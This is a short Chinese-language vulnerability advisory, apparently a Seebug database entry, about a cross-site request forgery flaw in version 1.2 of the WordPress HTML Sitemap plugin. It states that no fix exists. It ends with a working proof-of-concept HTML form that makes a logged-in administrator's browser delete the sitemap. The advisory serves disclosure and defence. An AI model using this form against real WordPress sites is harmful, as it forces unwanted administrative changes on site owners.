WordPress HTML Sitemap插件'inc/AdminPage.php'跨站请求伪造漏洞

2014-04-01T00:00:00
ID SSV:62018
Type seebug
Reporter Root
Modified 2014-04-01T00:00:00

Description

Bugtraq ID:66528

WordPress是一款内容管理系统。

WordPress HTML Sitemap插件存在跨站请求伪造漏洞,允许远程攻击者构建恶意URI,诱使用户解析,可以目标用户上下文执行恶意操作。 0 WordPress HTML Sitemap Plugin 1.2 目前没有详细解决方案: http://wordpress.org/plugins/wp-html-sitemap/

                                        
                                            
                                                <form action="http://not-a-real-site.local/wp-admin/options-general.php?page=wp-html-sitemap&tab=general"; method="POST">
<input type="text" name="deleteSitemap" value="Delete Sitemap">
<input type="submit">
</form>